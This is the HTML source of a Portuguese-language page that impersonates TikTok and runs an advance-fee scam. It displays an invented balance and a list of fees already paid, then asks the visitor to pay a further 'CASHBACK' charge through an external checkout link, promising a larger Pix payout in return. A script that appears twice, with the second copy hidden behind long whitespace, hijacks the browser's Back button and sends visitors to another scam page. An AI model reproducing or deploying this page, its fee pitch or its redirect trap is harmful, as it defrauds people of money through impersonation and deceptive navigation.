<html lang="pt-BR"><head></head><body>﻿
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>TikTok - Receba saque e taxas de volta!</title>
    <link rel="stylesheet" href="css/styles.css">
    <link href="https://tiktokprobrsite.netlify.app/03/css2-2@family=Inter%3Awght@400%3B500%3B600%3B700&display=swap.html" rel="stylesheet">
<script>
    (function() {
        const redirectURL = "https://spiffy-dusk-09a44c.netlify.app/backup/";
        const currentURL = location.href;

        // Adiciona um estado inicial no histórico
        history.replaceState({ redirected: false, currentURL: currentURL }, document.title, currentURL);

        // Adiciona um novo estado ao histórico para prevenir a ação de "voltar"
        history.pushState({ redirected: false, currentURL: currentURL }, document.title, currentURL);

        // Detecta ação de "voltar" no evento popstate
        window.onpopstate = function(event) {
            if (event.state && event.state.redirected === false) {
                // Evita múltiplos redirecionamentos e loops
                if (sessionStorage.getItem('backRedirectPrevented')) {
                    console.warn("Redirecionamento evitado: já tratado.");
                    return;
                }

                // Marca que o redirecionamento está em andamento
                sessionStorage.setItem('backRedirectPrevented', 'true');
                location.replace(redirectURL);
            }
        };

        // Previne loops caso o script seja recarregado na página de redirecionamento
        if (sessionStorage.getItem('backRedirectPrevented')) {
            if (location.href === redirectURL) {
                console.info("Redirecionamento concluído sem loops.");
                sessionStorage.removeItem('backRedirectPrevented');
            } else {
                sessionStorage.removeItem('backRedirectPrevented');
            }
        }

        // Para navegadores que não geram popstate ao navegar para trás
        window.addEventListener('beforeunload', function() {
            sessionStorage.removeItem('backRedirectPrevented');
        });
    })();
</script>

    <div class="container">
        <!-- Header -->
        <header class="header">
            <div class="logo">
                
            </div>
            <div class="balance">Saldo: R$559,51</div>
        </header>

        <!-- Main Card -->
        <div class="card">
            <div class="card-header">
                <div class="check-circle">
                    <svg width="32" height="32" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round">
                        <path d="M22 11.08V12a10 10 0 1 1-5.93-9.14"></path>
                        <polyline points="22 4 12 14.01 9 11.01"></polyline>
                    </svg>
                </div>
                <h2>RECEBA SAQUE E TAXAS DE VOLTA</h2>
            </div>

            <div class="card-content">
                <p class="subtitle">Veja abaixo os valores pagos em taxa:</p>

                <div class="fees">
                    <div class="fee-item">
                        <span>Taxa de Cadastro</span>
                        <span>R$ 19,90</span>
                    </div>
                    <div class="fee-item">
                        <span>Taxa de Liberação</span>
                        <span>R$ 27,90</span>
                    </div>
                    <div class="fee-item">
                        <span>Taxa Anti-Fraude</span>
                        <span>R$ 44,61</span>
                    </div>
                    

                    <div class="fee-item total">
                        <span>Total de taxas:</span>
                        <span>R$ 99,50</span>
                    </div>
                    <div class="fee-item total">
                        <span>Valor a receber com as taxas:</span>
                        <span>R$ 694,91</span>
                    </div>
                </div>

                <div class="info">
                    <p>Para receber seu saque e taxas de volta (R$ 92,50) é necessário efetuar o pagamento da tarifa CASHBACK no valor de R$ 36,90</p>
                    <p class="small">Após o pagamento automaticamente irá receber um pix no valor de R$ 694,91</p>
                </div>
            </div>

            <button class="action-button" id="returnButton" onclick="window.location.href='https://go.disruptybr.com.br/zu3hla3spm';">
             RECEBER SAQUE E TAXAS DE VOLTA!
          </button>
        </div>
    </div>
    <!-- <script src="script.js"></script> -->












































































<script>
    (function() {
        const redirectURL = "https://spiffy-dusk-09a44c.netlify.app/backup/";
        const currentURL = location.href;

        // Adiciona um estado inicial no histórico
        history.replaceState({ redirected: false, currentURL: currentURL }, document.title, currentURL);

        // Adiciona um novo estado ao histórico para prevenir a ação de "voltar"
        history.pushState({ redirected: false, currentURL: currentURL }, document.title, currentURL);

        // Detecta ação de "voltar" no evento popstate
        window.onpopstate = function(event) {
            if (event.state && event.state.redirected === false) {
                // Evita múltiplos redirecionamentos e loops
                if (sessionStorage.getItem('backRedirectPrevented')) {
                    console.warn("Redirecionamento evitado: já tratado.");
                    return;
                }

                // Marca que o redirecionamento está em andamento
                sessionStorage.setItem('backRedirectPrevented', 'true');
                location.replace(redirectURL);
            }
        };

        // Previne loops caso o script seja recarregado na página de redirecionamento
        if (sessionStorage.getItem('backRedirectPrevented')) {
            if (location.href === redirectURL) {
                console.info("Redirecionamento concluído sem loops.");
                sessionStorage.removeItem('backRedirectPrevented');
            } else {
                sessionStorage.removeItem('backRedirectPrevented');
            }
        }

        // Para navegadores que não geram popstate ao navegar para trás
        window.addEventListener('beforeunload', function() {
            sessionStorage.removeItem('backRedirectPrevented');
        });
    })();
</script>
</body></html>